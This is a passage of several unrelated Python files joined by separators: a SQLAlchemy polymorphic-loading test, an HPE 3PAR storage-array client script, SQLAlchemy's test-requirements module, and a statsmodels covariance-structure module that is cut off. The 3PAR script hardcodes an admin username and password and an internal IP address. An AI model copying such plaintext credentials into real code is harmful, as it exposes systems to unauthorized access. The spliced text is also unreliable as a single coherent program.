"poly.a_id AS poly_a_id, poly.c_c_data AS poly_c_c_data, "
"poly.e_id AS poly_e_id, poly.e_e_data AS poly_e_e_data, "
"poly.d_id AS poly_d_id, poly.d_d_data AS poly_d_d_data "
"FROM (SELECT a.id AS a_id, a.type AS a_type, "
"c.id AS c_id, "
"c.c_data AS c_c_data, d.id AS d_id, "
"d.d_data AS d_d_data, "
"e.id AS e_id, e.e_data AS e_e_data FROM a JOIN c "
"ON a.id = c.id LEFT OUTER JOIN d ON c.id = d.id "
"LEFT OUTER JOIN e ON c.id = e.id) AS poly "
"WHERE poly.a_id IN ([POSTCOMPILE_primary_keys]) "
"ORDER BY poly.a_id",
[{"primary_keys": [1, 2]}],
),
CompiledSQL(
"SELECT poly.a_type AS poly_a_type, "
"poly.c_id AS poly_c_id, "
"poly.a_id AS poly_a_id, poly.c_c_data AS poly_c_c_data, "
"poly.d_id AS poly_d_id, poly.d_d_data AS poly_d_d_data, "
"poly.e_id AS poly_e_id, poly.e_e_data AS poly_e_e_data "
"FROM (SELECT a.id AS a_id, a.type AS a_type, "
"c.id AS c_id, c.c_data AS c_c_data, d.id AS d_id, "
"d.d_data AS d_d_data, e.id AS e_id, "
"e.e_data AS e_e_data FROM a JOIN c ON a.id = c.id "
"LEFT OUTER JOIN d ON c.id = d.id "
"LEFT OUTER JOIN e ON c.id = e.id) AS poly "
"WHERE poly.a_id IN ([POSTCOMPILE_primary_keys]) "
"ORDER BY poly.a_id",
[{"primary_keys": [1, 2]}],
),
),
)
with self.assert_statement_count(testing.db, 0):
eq_(result, [d(d_data="d1"), e(e_data="e1")])
def test_partial_load_no_invoke_eagers(self):
# test issue #4199
self._fixture_from_geometry(
{
"a": {
"subclasses": {
"a1": {"polymorphic_load": "selectin"},
"a2": {"polymorphic_load": "selectin"},
}
}
}
)
a, a1, a2 = self.classes("a", "a1", "a2")
sess = fixture_session()
a1_obj = a1()
a2_obj = a2()
sess.add_all([a1_obj, a2_obj])
del a2_obj
sess.flush()
sess.expire_all()
# _with_invoke_all_eagers(False), used by the lazy loader
# strategy, will cause one less state to be present such that
# the poly loader won't locate a state limited to the "a1" mapper,
# needs to test that it has states
sess.query(a)._with_invoke_all_eagers(False).all()
class LoaderOptionsTest(
fixtures.DeclarativeMappedTest, testing.AssertsExecutionResults
):
@classmethod
def setup_classes(cls):
Base = cls.DeclarativeBasic
class Parent(fixtures.ComparableEntity, Base):
__tablename__ = "parent"
id = Column(Integer, primary_key=True)
class Child(fixtures.ComparableEntity, Base):
__tablename__ = "child"
id = Column(Integer, primary_key=True)
parent_id = Column(Integer, ForeignKey("parent.id"))
parent = relationship("Parent", backref=backref("children"))
type = Column(String(50), nullable=False)
__mapper_args__ = {"polymorphic_on": type}
class ChildSubclass1(Child):
__tablename__ = "child_subclass1"
id = Column(Integer, ForeignKey("child.id"), primary_key=True)
__mapper_args__ = {
"polymorphic_identity": "subclass1",
"polymorphic_load": "selectin",
}
class Other(fixtures.ComparableEntity, Base):
__tablename__ = "other"
id = Column(Integer, primary_key=True)
child_subclass_id = Column(
Integer, ForeignKey("child_subclass1.id")
)
child_subclass = relationship(
"ChildSubclass1", backref=backref("others")
)
@classmethod
def insert_data(cls, connection):
Parent, ChildSubclass1, Other = cls.classes(
"Parent", "ChildSubclass1", "Other"
)
session = Session(connection)
parent = Parent(id=1)
subclass1 = ChildSubclass1(id=1, parent=parent)
other = Other(id=1, child_subclass=subclass1)
session.add_all([parent, subclass1, other])
session.commit()
def test_options_dont_pollute_baked(self):
self._test_options_dont_pollute(True)
def test_options_dont_pollute_unbaked(self):
self._test_options_dont_pollute(False)
def _test_options_dont_pollute(self, enable_baked):
Parent, ChildSubclass1, Other = self.classes(
"Parent", "ChildSubclass1", "Other"
)
session = fixture_session(enable_baked_queries=enable_baked)
def no_opt():
q = session.query(Parent).options(
joinedload(Parent.children.of_type(ChildSubclass1))
)
return self.assert_sql_execution(
testing.db,
q.all,
CompiledSQL(
"SELECT parent.id AS parent_id, "
"anon_1.child_id AS anon_1_child_id, "
"anon_1.child_parent_id AS anon_1_child_parent_id, "
"anon_1.child_type AS anon_1_child_type, "
"anon_1.child_subclass1_id AS anon_1_child_subclass1_id "
"FROM parent "
"LEFT OUTER JOIN (SELECT child.id AS child_id, "
"child.parent_id AS child_parent_id, "
"child.type AS child_type, "
"child_subclass1.id AS child_subclass1_id "
"FROM child "
"LEFT OUTER JOIN child_subclass1 "
"ON child.id = child_subclass1.id) AS anon_1 "
"ON parent.id = anon_1.child_parent_id",
{},
),
CompiledSQL(
"SELECT child_subclass1.id AS child_subclass1_id, "
"child.id AS child_id, "
"child.parent_id AS child_parent_id, "
"child.type AS child_type "
"FROM child JOIN child_subclass1 "
"ON child.id = child_subclass1.id "
"WHERE child.id IN ([POSTCOMPILE_primary_keys]) "
"ORDER BY child.id",
[{"primary_keys": [1]}],
),
)
result = no_opt()
with self.assert_statement_count(testing.db, 1):
eq_(result, [Parent(children=[ChildSubclass1(others=[Other()])])])
session.expunge_all()
q = session.query(Parent).options(
joinedload(Parent.children.of_type(ChildSubclass1)).joinedload(
ChildSubclass1.others
)
)
result = self.assert_sql_execution(
testing.db,
q.all,
CompiledSQL(
"SELECT parent.id AS parent_id, "
"anon_1.child_id AS anon_1_child_id, "
"anon_1.child_parent_id AS anon_1_child_parent_id, "
"anon_1.child_type AS anon_1_child_type, "
"anon_1.child_subclass1_id AS anon_1_child_subclass1_id, "
"other_1.id AS other_1_id, "
"other_1.child_subclass_id AS other_1_child_subclass_id "
"FROM parent LEFT OUTER JOIN "
"(SELECT child.id AS child_id, "
"child.parent_id AS child_parent_id, "
"child.type AS child_type, "
"child_subclass1.id AS child_subclass1_id "
"FROM child LEFT OUTER JOIN child_subclass1 "
"ON child.id = child_subclass1.id) AS anon_1 "
"ON parent.id = anon_1.child_parent_id "
"LEFT OUTER JOIN other AS other_1 "
"ON anon_1.child_subclass1_id = other_1.child_subclass_id",
{},
),
CompiledSQL(
"SELECT child_subclass1.id AS child_subclass1_id, "
"child.id AS child_id, child.parent_id AS child_parent_id, "
"child.type AS child_type, other_1.id AS other_1_id, "
"other_1.child_subclass_id AS other_1_child_subclass_id "
"FROM child JOIN child_subclass1 "
"ON child.id = child_subclass1.id "
"LEFT OUTER JOIN other AS other_1 "
"ON child_subclass1.id = other_1.child_subclass_id "
"WHERE child.id IN ([POSTCOMPILE_primary_keys]) "
"ORDER BY child.id",
[{"primary_keys": [1]}],
),
)
with self.assert_statement_count(testing.db, 0):
eq_(result, [Parent(children=[ChildSubclass1(others=[Other()])])])
session.expunge_all()
result = no_opt()
with self.assert_statement_count(testing.db, 1):
eq_(result, [Parent(children=[ChildSubclass1(others=[Other()])])])
|
|
import argparse
from os import sys
import random
from sys import path
from os import getcwd
import os, sys, inspect, pprint
# this is a hack to get the hpe driver module
# and it's utils module on the search path.
cmd_folder = os.path.realpath(os.path.abspath("..") )
if cmd_folder not in sys.path:
sys.path.insert(0, cmd_folder)
from hpe3parclient import client, exceptions
parser = argparse.ArgumentParser()
parser.add_argument("-debug", help="Turn on http debugging", default=False, action="store_true")
args = parser.parse_args()
username = "admin"
password = "hpe"
testVolName = "WALTTESTVOL"
testSNAPName = testVolName+"SNAP"
testCPGName = "WALTTESTCPG"
#cl = client.HPE3ParClient("https://localhost:8080/api/v1")
cl = client.HPE3ParClient("https://10.10.20.242:8080/api/v1")
if "debug" in args and args.debug == True:
cl.debug_rest(True)
def get_volumes():
print("Get Volumes")
try:
volumes = cl.getVolumes()
if volumes:
for volume in volumes['members']:
print("Found '%s'" % volume['name'])
except exceptions.HTTPUnauthorized as ex:
print("You must login first")
except Exception as ex:
print(ex)
print("Complete\n")
def get_hosts():
print("Get Hosts")
try:
hosts = cl.getHosts()
if hosts:
for host in hosts['members']:
pprint.pprint(host)
# print "Found '%s'" % host['name']
except exceptions.HTTPUnauthorized as ex:
print("You must login first")
except Exception as ex:
print(ex)
def get_host(hostname):
try:
host = cl.getHost(hostname)
pprint.pprint(host)
except exceptions.HTTPUnauthorized as ex:
print("You must login first")
except Exception as ex:
print(ex)
def get_vluns():
print("Get VLUNs")
try:
vluns = cl.getVLUNs()
if vluns:
pprint.pprint(vluns)
for vlun in vluns['members']:
print("Found CPG '%s'" % vlun['volumeName'])
except exceptions.HTTPUnauthorized as ex:
print("You must login first")
except Exception as ex:
print(ex)
def get_vlun(vlunname):
try:
vlun = cl.getVLUN(vlunname)
pprint.pprint(vlun)
except exceptions.HTTPUnauthorized as ex:
print("You must login first")
except Exception as ex:
print(ex)
def get_cpgs():
print("Get CPGs")
try:
cpgs = cl.getCPGs()
if cpgs:
for cpg in cpgs['members']:
print("Found CPG '%s'" % cpg['name'])
except exceptions.HTTPUnauthorized as ex:
print("You must login first")
except Exception as ex:
print(ex)
def create_test_host():
hostname = "WALT_TEST_HOST2"
try:
host = cl.getHost(hostname)
print("host already exists")
except exceptions.HTTPNotFound as ex:
cl.createHost(hostname, {'domain':'WALT_TEST'})
pass
except exceptions.HTTPUnauthorized as ex:
print("You must login")
except Exception as ex:
print(ex)
def delete_test_host():
try:
cl.deleteHost("WALT_TEST_HOST2")
except exceptions.HTTPUnauthorized as ex:
print("You must login")
except Exception as ex:
print(ex)
def create_test_cpg():
try:
cl.createCPG(testCPGName, {'domain':'WALT_TEST', 'LDLayout' : {'RAIDType' : 1}})
except exceptions.HTTPUnauthorized as ex:
print("You must login first")
except exceptions.HTTPConflict as ex:
# the cpg already exists.
pass
except Exception as ex:
pprint.pprint(ex)
return
def delete_test_cpg():
try:
cl.deleteCPG(testCPGName)
except exceptions.HTTPUnauthorized as ex:
print("You must login first")
except exceptions.HTTPConflict as ex:
# the cpg already exists.
pass
except Exception as ex:
pprint.pprint(ex)
return
def create_volumes():
print("Create Volumes")
try:
volName = "%s1" % testVolName
print("Creating Volume '%s'" % volName)
cl.createVolume(volName, testCPGName, 300)
volName = "%s2" % testVolName
print("Creating Volume '%s'" % volName)
cl.createVolume(volName, testCPGName, 1024,
{'comment': 'something', 'tpvv': True})
except exceptions.HTTPUnauthorized as ex:
pprint.pprint("You must login first")
except Exception as ex:
print(ex)
try:
volume = cl.createVolume("%s1" % testVolName, testCPGName, 2048)
except exceptions.HTTPConflict as ex:
print("Got Expected Exception %s" % ex)
pass
print("Complete\n")
def create_snapshots():
print("Create Snapshots")
try:
volName = "%s11" % testVolName
print("Creating Volume '%s'" % volName)
cl.createVolume(volName, testCPGName, 100, {'snapCPG': testCPGName})
volume = cl.getVolume(volName)
snapName = "%s1" % testSNAPName
print("Creating Snapshot '%s'" % snapName)
cl.createSnapshot(snapName, volName,
{'readOnly' : True, 'comment': "Some comment",
# {'comment': "Some comment",
'retentionHours' : 1,
'expirationHours' : 2})
except exceptions.HTTPUnauthorized as ex:
print("You must login first")
except Exception as ex:
print(ex)
print("Complete\n")
def delete_snapshots():
print("Delete Snapshots")
try:
volumes = cl.getVolumes()
if volumes:
for volume in volumes['members']:
if volume['name'].startswith(testSNAPName):
print("Deleting volume '%s'" % volume['name'])
cl.deleteVolume(volume['name'])
except exceptions.HTTPUnauthorized as ex:
print("You must login first")
except Exception as ex:
print(ex)
print("Complete\n")
def delete_volumes():
print("Delete Volumes")
try:
volumes = cl.getVolumes()
if volumes:
for volume in volumes['members']:
if volume['name'].startswith(testVolName):
print("Deleting volume '%s'" % volume['name'])
cl.deleteVolume(volume['name'])
except exceptions.HTTPUnauthorized as ex:
print("You must login first")
except Exception as ex:
print(ex)
print("Complete\n")
#cl.login(username, password, {'InServ':'10.10.22.241'})
cl.login(username, password)
#get_cpgs()
#create_test_host()
#get_hosts()
#get_host('manualkvmtest')
#get_vluns()
#get_vlun('WALTTESTVOL11')
#delete_test_host()
#get_hosts()
#get_volumes()
#create_test_cpg()
#create_volumes()
#delete_volumes()
#create_snapshots()
#delete_snapshots()
#delete_test_cpg()
opts = {'online': True}
ret = cl.copyVolume('osv-FOOBAR', 'walt-vv', 'OpenStackCPG_RAID0_FC', opts)
pprint.pprint("Return %s" % ret)
#cl.stopPhysicalCopy('walt-vv')
|
|
# testing/requirements.py
# Copyright (C) 2005-2016 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Global database feature support policy.
Provides decorators to mark tests requiring specific feature support from the
target database.
External dialect test suites should subclass SuiteRequirements
to provide specific inclusion/exclusions.
"""
import sys
from . import exclusions
from .. import util
class Requirements(object):
pass
class SuiteRequirements(Requirements):
@property
def create_table(self):
"""target platform can emit basic CreateTable DDL."""
return exclusions.open()
@property
def drop_table(self):
"""target platform can emit basic DropTable DDL."""
return exclusions.open()
@property
def foreign_keys(self):
"""Target database must support foreign keys."""
return exclusions.open()
@property
def on_update_cascade(self):
""""target database must support ON UPDATE..CASCADE behavior in
foreign keys."""
return exclusions.open()
@property
def non_updating_cascade(self):
"""target database must *not* support ON UPDATE..CASCADE behavior in
foreign keys."""
return exclusions.closed()
@property
def deferrable_fks(self):
return exclusions.closed()
@property
def on_update_or_deferrable_fks(self):
# TODO: exclusions should be composable,
# somehow only_if([x, y]) isn't working here, negation/conjunctions
# getting confused.
return exclusions.only_if(
lambda: self.on_update_cascade.enabled or
self.deferrable_fks.enabled
)
@property
def self_referential_foreign_keys(self):
"""Target database must support self-referential foreign keys."""
return exclusions.open()
@property
def foreign_key_ddl(self):
"""Target database must support the DDL phrases for FOREIGN KEY."""
return exclusions.open()
@property
def named_constraints(self):
"""target database must support names for constraints."""
return exclusions.open()
@property
def subqueries(self):
"""Target database must support subqueries."""
return exclusions.open()
@property
def offset(self):
"""target database can render OFFSET, or an equivalent, in a
SELECT.
"""
return exclusions.open()
@property
def bound_limit_offset(self):
"""target database can render LIMIT and/or OFFSET using a bound
parameter
"""
return exclusions.open()
@property
def parens_in_union_contained_select_w_limit_offset(self):
"""Target database must support parenthesized SELECT in UNION
when LIMIT/OFFSET is specifically present.
E.g. (SELECT ...) UNION (SELECT ..)
This is known to fail on SQLite.
"""
return exclusions.open()
@property
def parens_in_union_contained_select_wo_limit_offset(self):
"""Target database must support parenthesized SELECT in UNION
when OFFSET/LIMIT is specifically not present.
E.g. (SELECT ... LIMIT ..) UNION (SELECT .. OFFSET ..)
This is known to fail on SQLite. It also fails on Oracle
because without LIMIT/OFFSET, there is currently no step that
creates an additional subquery.
"""
return exclusions.open()
@property
def boolean_col_expressions(self):
"""Target database must support boolean expressions as columns"""
return exclusions.closed()
@property
def nullsordering(self):
"""Target backends that support nulls ordering."""
return exclusions.closed()
@property
def standalone_binds(self):
"""target database/driver supports bound parameters as column expressions
without being in the context of a typed column.
"""
return exclusions.closed()
@property
def intersect(self):
"""Target database must support INTERSECT or equivalent."""
return exclusions.closed()
@property
def except_(self):
"""Target database must support EXCEPT or equivalent (i.e. MINUS)."""
return exclusions.closed()
@property
def window_functions(self):
"""Target database must support window functions."""
return exclusions.closed()
@property
def autoincrement_insert(self):
"""target platform generates new surrogate integer primary key values
when insert() is executed, excluding the pk column."""
return exclusions.open()
@property
def fetch_rows_post_commit(self):
"""target platform will allow cursor.fetchone() to proceed after a
COMMIT.
Typically this refers to an INSERT statement with RETURNING which
is invoked within "autocommit". If the row can be returned
after the autocommit, then this rule can be open.
"""
return exclusions.open()
@property
def empty_inserts(self):
"""target platform supports INSERT with no values, i.e.
INSERT DEFAULT VALUES or equivalent."""
return exclusions.only_if(
lambda config: config.db.dialect.supports_empty_insert or
config.db.dialect.supports_default_values,
"empty inserts not supported"
)
@property
def insert_from_select(self):
"""target platform supports INSERT from a SELECT."""
return exclusions.open()
@property
def returning(self):
"""target platform supports RETURNING."""
return exclusions.only_if(
lambda config: config.db.dialect.implicit_returning,
"%(database)s %(does_support)s 'returning'"
)
@property
def duplicate_names_in_cursor_description(self):
"""target platform supports a SELECT statement that has
the same name repeated more than once in the columns list."""
return exclusions.open()
@property
def denormalized_names(self):
"""Target database must have 'denormalized', i.e.
UPPERCASE as case insensitive names."""
return exclusions.skip_if(
lambda config: not config.db.dialect.requires_name_normalize,
"Backend does not require denormalized names."
)
@property
def multivalues_inserts(self):
"""target database must support multiple VALUES clauses in an
INSERT statement."""
return exclusions.skip_if(
lambda config: not config.db.dialect.supports_multivalues_insert,
"Backend does not support multirow inserts."
)
@property
def implements_get_lastrowid(self):
""""target dialect implements the executioncontext.get_lastrowid()
method without reliance on RETURNING.
"""
return exclusions.open()
@property
def emulated_lastrowid(self):
""""target dialect retrieves cursor.lastrowid, or fetches
from a database-side function after an insert() construct executes,
within the get_lastrowid() method.
Only dialects that "pre-execute", or need RETURNING to get last
inserted id, would return closed/fail/skip for this.
"""
return exclusions.closed()
@property
def dbapi_lastrowid(self):
""""target platform includes a 'lastrowid' accessor on the DBAPI
cursor object.
"""
return exclusions.closed()
@property
def views(self):
"""Target database must support VIEWs."""
return exclusions.closed()
@property
def schemas(self):
"""Target database must support external schemas, and have one
named 'test_schema'."""
return exclusions.closed()
@property
def sequences(self):
"""Target database must support SEQUENCEs."""
return exclusions.only_if([
lambda config: config.db.dialect.supports_sequences
], "no sequence support")
@property
def sequences_optional(self):
"""Target database supports sequences, but also optionally
as a means of generating new PK values."""
return exclusions.only_if([
lambda config: config.db.dialect.supports_sequences and
config.db.dialect.sequences_optional
], "no sequence support, or sequences not optional")
@property
def reflects_pk_names(self):
return exclusions.closed()
@property
def table_reflection(self):
return exclusions.open()
@property
def view_column_reflection(self):
"""target database must support retrieval of the columns in a view,
similarly to how a table is inspected.
This does not include the full CREATE VIEW definition.
"""
return self.views
@property
def view_reflection(self):
"""target database must support inspection of the full CREATE VIEW definition.
"""
return self.views
@property
def schema_reflection(self):
return self.schemas
@property
def primary_key_constraint_reflection(self):
return exclusions.open()
@property
def foreign_key_constraint_reflection(self):
return exclusions.open()
@property
def foreign_key_constraint_option_reflection(self):
return exclusions.closed()
@property
def temp_table_reflection(self):
return exclusions.open()
@property
def temp_table_names(self):
"""target dialect supports listing of temporary table names"""
return exclusions.closed()
@property
def temporary_tables(self):
"""target database supports temporary tables"""
return exclusions.open()
@property
def temporary_views(self):
"""target database supports temporary views"""
return exclusions.closed()
@property
def index_reflection(self):
return exclusions.open()
@property
def unique_constraint_reflection(self):
"""target dialect supports reflection of unique constraints"""
return exclusions.open()
@property
def duplicate_key_raises_integrity_error(self):
"""target dialect raises IntegrityError when reporting an INSERT
with a primary key violation. (hint: it should)
"""
return exclusions.open()
@property
def unbounded_varchar(self):
"""Target database must support VARCHAR with no length"""
return exclusions.open()
@property
def unicode_data(self):
"""Target database/dialect must support Python unicode objects with
non-ASCII characters represented, delivered as bound parameters
as well as in result rows.
"""
return exclusions.open()
@property
def unicode_ddl(self):
"""Target driver must support some degree of non-ascii symbol
names.
"""
return exclusions.closed()
@property
def datetime_literals(self):
"""target dialect supports rendering of a date, time, or datetime as a
literal string, e.g. via the TypeEngine.literal_processor() method.
"""
return exclusions.closed()
@property
def datetime(self):
"""target dialect supports representation of Python
datetime.datetime() objects."""
return exclusions.open()
@property
def datetime_microseconds(self):
"""target dialect supports representation of Python
datetime.datetime() with microsecond objects."""
return exclusions.open()
@property
def datetime_historic(self):
"""target dialect supports representation of Python
datetime.datetime() objects with historic (pre 1970) values."""
return exclusions.closed()
@property
def date(self):
"""target dialect supports representation of Python
datetime.date() objects."""
return exclusions.open()
@property
def date_coerces_from_datetime(self):
"""target dialect accepts a datetime object as the target
of a date column."""
return exclusions.open()
@property
def date_historic(self):
"""target dialect supports representation of Python
datetime.datetime() objects with historic (pre 1970) values."""
return exclusions.closed()
@property
def time(self):
"""target dialect supports representation of Python
datetime.time() objects."""
return exclusions.open()
@property
def time_microseconds(self):
"""target dialect supports representation of Python
datetime.time() with microsecond objects."""
return exclusions.open()
@property
def binary_comparisons(self):
"""target database/driver can allow BLOB/BINARY fields to be compared
against a bound parameter value.
"""
return exclusions.open()
@property
def binary_literals(self):
"""target backend supports simple binary literals, e.g. an
expression like::
SELECT CAST('foo' AS BINARY)
Where ``BINARY`` is the type emitted from :class:`.LargeBinary`,
e.g. it could be ``BLOB`` or similar.
Basically fails on Oracle.
"""
return exclusions.open()
@property
def json_type(self):
"""target platform implements a native JSON type."""
return exclusions.closed()
@property
def json_array_indexes(self):
""""target platform supports numeric array indexes
within a JSON structure"""
return self.json_type
@property
def precision_numerics_general(self):
"""target backend has general support for moderately high-precision
numerics."""
return exclusions.open()
@property
def precision_numerics_enotation_small(self):
"""target backend supports Decimal() objects using E notation
to represent very small values."""
return exclusions.closed()
@property
def precision_numerics_enotation_large(self):
"""target backend supports Decimal() objects using E notation
to represent very large values."""
return exclusions.closed()
@property
def precision_numerics_many_significant_digits(self):
"""target backend supports values with many digits on both sides,
such as 319438950232418390.273596, 87673.594069654243
"""
return exclusions.closed()
@property
def precision_numerics_retains_significant_digits(self):
"""A precision numeric type will return empty significant digits,
i.e. a value such as 10.000 will come back in Decimal form with
the .000 maintained."""
return exclusions.closed()
@property
def precision_generic_float_type(self):
"""target backend will return native floating point numbers with at
least seven decimal places when using the generic Float type.
"""
return exclusions.open()
@property
def floats_to_four_decimals(self):
"""target backend can return a floating-point number with four
significant digits (such as 15.7563) accurately
(i.e. without FP inaccuracies, such as 15.75629997253418).
"""
return exclusions.open()
@property
def fetch_null_from_numeric(self):
"""target backend doesn't crash when you try to select a NUMERIC
value that has a value of NULL.
Added to support Pyodbc bug #351.
"""
return exclusions.open()
@property
def text_type(self):
"""Target database must support an unbounded Text() "
"type such as TEXT or CLOB"""
return exclusions.open()
@property
def empty_strings_varchar(self):
"""target database can persist/return an empty string with a
varchar.
"""
return exclusions.open()
@property
def empty_strings_text(self):
"""target database can persist/return an empty string with an
unbounded text."""
return exclusions.open()
@property
def selectone(self):
"""target driver must support the literal statement 'select 1'"""
return exclusions.open()
@property
def savepoints(self):
"""Target database must support savepoints."""
return exclusions.closed()
@property
def two_phase_transactions(self):
"""Target database must support two-phase transactions."""
return exclusions.closed()
@property
def update_from(self):
"""Target must support UPDATE..FROM syntax"""
return exclusions.closed()
@property
def update_where_target_in_subquery(self):
"""Target must support UPDATE where the same table is present in a
subquery in the WHERE clause.
This is an ANSI-standard syntax that apparently MySQL can't handle,
such as:
UPDATE documents SET flag=1 WHERE documents.title IN
(SELECT max(documents.title) AS title
FROM documents GROUP BY documents.user_id
)
"""
return exclusions.open()
@property
def mod_operator_as_percent_sign(self):
"""target database must use a plain percent '%' as the 'modulus'
operator."""
return exclusions.closed()
@property
def percent_schema_names(self):
"""target backend supports weird identifiers with percent signs
in them, e.g. 'some % column'.
this is a very weird use case but often has problems because of
DBAPIs that use python formatting. It's not a critical use
case either.
"""
return exclusions.closed()
@property
def order_by_label_with_expression(self):
"""target backend supports ORDER BY a column label within an
expression.
Basically this::
select data as foo from test order by foo || 'bar'
Lots of databases including Postgresql don't support this,
so this is off by default.
"""
return exclusions.closed()
@property
def unicode_connections(self):
"""Target driver must support non-ASCII characters being passed at
all.
"""
return exclusions.open()
@property
def graceful_disconnects(self):
"""Target driver must raise a DBAPI-level exception, such as
InterfaceError, when the underlying connection has been closed
and the execute() method is called.
"""
return exclusions.open()
@property
def skip_mysql_on_windows(self):
"""Catchall for a large variety of MySQL on Windows failures"""
return exclusions.open()
@property
def ad_hoc_engines(self):
"""Test environment must allow ad-hoc engine/connection creation.
DBs that scale poorly for many connections, even when closed, i.e.
Oracle, may use the "--low-connections" option which flags this
requirement as not present.
"""
return exclusions.skip_if(
lambda config: config.options.low_connections)
@property
def timing_intensive(self):
return exclusions.requires_tag("timing_intensive")
@property
def memory_intensive(self):
return exclusions.requires_tag("memory_intensive")
@property
def threading_with_mock(self):
"""Mark tests that use threading and mock at the same time - stability
issues have been observed with coverage + python 3.3
"""
return exclusions.skip_if(
lambda config: util.py3k and config.options.has_coverage,
"Stability issues with coverage + py3k"
)
@property
def python2(self):
return exclusions.skip_if(
lambda: sys.version_info >= (3,),
"Python version 2.xx is required."
)
@property
def python3(self):
return exclusions.skip_if(
lambda: sys.version_info < (3,),
"Python version 3.xx is required."
)
@property
def cpython(self):
return exclusions.only_if(
lambda: util.cpython,
"cPython interpreter needed"
)
@property
def non_broken_pickle(self):
from sqlalchemy.util import pickle
return exclusions.only_if(
lambda: not util.pypy and pickle.__name__ == 'cPickle'
or sys.version_info >= (3, 2),
"Needs cPickle+cPython or newer Python 3 pickle"
)
@property
def predictable_gc(self):
"""target platform must remove all cycles unconditionally when
gc.collect() is called, as well as clean out unreferenced subclasses.
"""
return self.cpython
@property
def no_coverage(self):
"""Test should be skipped if coverage is enabled.
This is to block tests that exercise libraries that seem to be
sensitive to coverage, such as Postgresql notice logging.
"""
return exclusions.skip_if(
lambda config: config.options.has_coverage,
"Issues observed when coverage is enabled"
)
def _has_mysql_on_windows(self, config):
return False
def _has_mysql_fully_case_sensitive(self, config):
return False
@property
def sqlite(self):
return exclusions.skip_if(lambda: not self._has_sqlite())
@property
def cextensions(self):
return exclusions.skip_if(
lambda: not self._has_cextensions(), "C extensions not installed"
)
def _has_sqlite(self):
from sqlalchemy import create_engine
try:
create_engine('sqlite://')
return True
except ImportError:
return False
def _has_cextensions(self):
try:
from sqlalchemy import cresultproxy, cprocessors
return True
except ImportError:
return False
|
|
from statsmodels.compat.python import iterkeys, itervalues, zip, range
from statsmodels.stats.correlation_tools import cov_nearest
import numpy as np
from scipy import linalg as spl
from statsmodels.tools.sm_exceptions import (ConvergenceWarning,
IterationLimitWarning)
import warnings
class CovStruct(object):
"""
A base class for correlation and covariance structures of grouped
data.
Each implementation of this class takes the residuals from a
regression model that has been fitted to grouped data, and uses
them to estimate the within-group dependence structure of the
random errors in the model.
The state of the covariance structure is represented through the
value of the class variable `dep_params`. The default state of a
newly-created instance should correspond to the identity
correlation matrix.
"""
def __init__(self, cov_nearest_method="clipped"):
# Parameters describing the dependency structure
self.dep_params = None
# Keep track of the number of times that the covariance was
# adjusted.
self.cov_adjust = []
# Method for projecting the covariance matrix if it not SPD.
self.cov_nearest_method = cov_nearest_method
def initialize(self, model):
"""
Called by GEE, used by implementations that need additional
setup prior to running `fit`.
Parameters
----------
model : GEE class
A reference to the parent GEE class instance.
"""
self.model = model
def update(self, params):
"""
Updates the association parameter values based on the current
regression coefficients.
Parameters
----------
params : array-like
Working values for the regression parameters.
"""
raise NotImplementedError
def covariance_matrix(self, endog_expval, index):
"""
Returns the working covariance or correlation matrix for a
given cluster of data.
Parameters
----------
endog_expval: array-like
The expected values of endog for the cluster for which the
covariance or correlation matrix will be returned
index: integer
The index of the cluster for which the covariane or
correlation matrix will be returned
Returns
-------
M: matrix
The covariance or correlation matrix of endog
is_cor: bool
True if M is a correlation matrix, False if M is a
covariance matrix
"""
raise NotImplementedError
def covariance_matrix_solve(self, expval, index, stdev, rhs):
"""
Solves matrix equations of the form `covmat * soln = rhs` and
returns the values of `soln`, where `covmat` is the covariance
matrix represented by this class.
Parameters
----------
expval: array-like
The expected value of endog for each observed value in the
group.
index: integer
The group index.
stdev : array-like
The standard deviation of endog for each observation in
the group.
rhs : list/tuple of array-like
A set of right-hand sides; each defines a matrix equation
to be solved.
Returns
-------
soln : list/tuple of array-like
The solutions to the matrix equations.
Notes
-----
Returns None if the solver fails.
Some dependence structures do not use `expval` and/or `index`
to determine the correlation matrix. Some families
(e.g. binomial) do not use the `stdev` parameter when forming
the covariance matrix.
If the covariance matrix is singular or not SPD, it is
projected to the nearest such matrix. These projection events
are recorded in the fit_history member of the GEE model.
Systems of linear equations with the covariance matrix as the
left hand side (LHS) are solved for different right hand sides
(RHS); the LHS is only factorized once to save time.
This is a default implementation, it can be reimplemented in
subclasses to optimize the linear algebra according to the
struture of the covariance matrix.
"""
vmat, is_cor = self.covariance_matrix(expval, index)
if is_cor:
vmat *= np.outer(stdev, stdev)
# Factor the covariance matrix. If the factorization fails,
# attempt to condition it into a factorizable matrix.
threshold = 1e-2
success = False
cov_adjust = 0
for itr in range(20):
try:
vco = spl.cho_factor(vmat)
success = True
break
except np.linalg.LinAlgError:
vmat = cov_nearest(vmat, method=self.cov_nearest_method,
threshold=threshold)
threshold *= 2
cov_adjust += 1
self.cov_adjust.append(cov_adjust)
# Last resort if we still can't factor the covariance matrix.
if success == False:
warnings.warn("Unable to condition covariance matrix to an SPD matrix using cov_nearest",
ConvergenceWarning)
vmat = np.diag(np.diag(vmat))
vco = spl.cho_factor(vmat)
soln = [spl.cho_solve(vco, x) for x in rhs]
return soln
def summary(self):
"""
Returns a text summary of the current estimate of the
dependence structure.
"""
raise NotImplementedError
class Independence(CovStruct):
"""
An independence working dependence structure.
"""
# Nothing to update
def update(self, params):
return
def covariance_matrix(self, expval, index):
dim = len(expval)
return np.eye(dim, dtype=np.float64), True
def covariance_matrix_solve(self, expval, index, stdev, rhs):
v = stdev**2
rslt = []
for x in rhs:
if x.ndim == 1:
rslt.append(x / v)
else:
rslt.append(x / v[:, None])
return rslt
update.__doc__ = CovStruct.update.__doc__
covariance_matrix.__doc__ = CovStruct.covariance_matrix.__doc__
covariance_matrix_solve.__doc__ = CovStruct.covariance_matrix_solve.__doc__
def summary(self):
return "Observations within a cluster are modeled as being independent."
class Exchangeable(CovStruct):
"""
An exchangeable working dependence structure.
"""
def __init__(self):
super(Exchangeable, self).__init__()
# The correlation between any two values in the same cluster
self.dep_params = 0.
def update(self, params):
endog = self.model.endog_li
nobs = self.model.nobs
dim = len(params)
varfunc = self.model.family.variance
cached_means = self.model.cached_means
residsq_sum, scale, nterm = 0, 0, 0
for i in range(self.model.num_group):
expval, _ = cached_means[i]
stdev = np.sqrt(varfunc(expval))
resid = (endog[i] - expval) / stdev
ngrp = len(resid)
residsq = np.outer(resid, resid)
scale += np.trace(residsq)
